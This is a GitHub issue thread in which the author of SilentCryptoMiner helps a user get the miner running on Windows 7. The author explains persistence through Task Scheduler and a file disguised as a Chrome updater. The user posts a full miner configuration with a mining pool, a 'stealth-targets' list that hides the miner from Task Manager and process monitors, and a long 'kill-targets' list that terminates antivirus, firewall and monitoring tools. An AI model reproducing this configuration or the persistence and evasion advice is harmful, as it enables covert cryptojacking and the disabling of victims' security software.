### ISSUE TITLE
Application Not Working 

### ISSUE THREAD

**Issue by tarekxxx** [UnamSanctam/SilentCryptoMiner#1082]
On Windows 7 Pro Version 6.1.7600 Build 7600
Did you Try this Before ? even Task Scheduler not save any commands !

**Comment by UnamSanctam** [comment]
Yes I try it on Windows 7, Windows 8, Windows 10 and Windows 11. Windows 7 uses different commands in the miner since the new Task Scheduler commands doesn't work there.

I just opened up my Windows 7 VM again and it worked fine there.

**Comment by tarekxxx** [comment]
so how i make it work in my windows 7 ?

**Comment by UnamSanctam** [comment]
It should already work, I just tested it when I sent that message.

**Comment by tarekxxx** [comment]
i dont really know but i notice something google/chrome not in C:\Program Files this maybe the problem ?

**Comment by UnamSanctam** [comment]
Maybe, check both the Task Scheduler for any task and if you have both "Run as System" and "Run as Administrator" enabled then check `C:\Program Files\Google\Chrome\updater.exe` for the file. Also make sure that "Startup" is enabled.

**Comment by tarekxxx** [comment]
ok i will try in another place when go work tommorow and tell you what happen with me and yea i run always with admin

**Comment by tarekxxx** [comment]
i tryed again with another place temp but same not working was loading first then nothing !

**Comment by UnamSanctam** [comment]
And you ran it with "DEBUG" enabled in "Advanced Options"? Are you sure the computer doesn't have any sort of protections? Because it works fine on Windows 7 so that's not the cause.

**Comment by tarekxxx** [comment]
{
	"algo": "rx/0",
	"pool": "gulf.moneroocean.stream",
	"port": 443,
	"wallet": "wallet",
	"password": "Mody~ghostrider",
	"ssltls": true,
	"max-cpu": 0,
	"idle-wait": 1,
	"idle-cpu": 80,
	"stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
	"kill-targets": "afwServ.exe,aswEngSrv.exe,aswidsagent.exe,aswToolsSvc.exe,AvastSvc.exe,AvastSvc.exe,AvastUI.exe,wsc_proxy.exe,AvastBrowser.exe,AvastNM.exe,ashwebsv.exe,aswupdsv.exe,kavfswp.exe,kavtray.exe,kavfsmui.exe,kavshell.exe,kavfsrcn.exe,kavfs.exe,kavfsgt.exe,kavfswh.exe,kavfsscs.exe,efpeadm.exe,VPNGUI.exe,CVPND.exe,IPSECLOG.exe,cfp.exe,fsdfwd.exe,fsguiexe.exe,blackd.exe,kpf4gui.exe,MSSCLL.exe,MCSHELL.exe,MPFSERVICE.exe,MPFAGENT.exe,nisum.exe,smc.exe,persfw.exe,pccpfw.exe,WINSS.exe,ZLCLIENT.exe,MCODS.exe,MCSHIELD.exe,msmpeng.exe,navapsvc.exe,avkwctl.exe,fsav32.exe,mcshield.exe,ntrtscan.exe,avguard.exe,ashServ.exe,AVENGINE.exe,avgemc.exe,tmntsrv.exe,advchk.exe,ahnsd.exe,alertsvc.exe,avmaisrv.exe,avsynmgr.exe,bitdefender_p2p_startup.exe,cavrid.exe,cavtray.exe,cmgrdian.exe,freshclam.exe,icepack.exe,mgavrtcl.exe,mghtml.exe,mgui.exe,navapsvc.exe,navapw32.exe,navw32.exe,nsmdtr.exe,ofcdog.exe,pav.exe,savscan.exe,spider.exe,xcommsvr.exe,Procmon64a.exe,Procmon64.exe,Procmon.exe,anvir.exe,regedit.exe,MRT.exe",
	"api-endpoint": ""
}

**Comment by UnamSanctam** [comment]
Can you post your builder settings, press "Save" in the "Main" tab and then zip the xml file and send it here? Did you try to run it with "DEBUG" enabled or not?

**Comment by tarekxxx** [comment]
no i didnt try with debug  but i will try

**Comment by tarekxxx** [comment]
[XzeroX.zip](https://github.com/UnamSanctam/SilentCryptoMiner/files/9459255/XzeroX.zip)
here
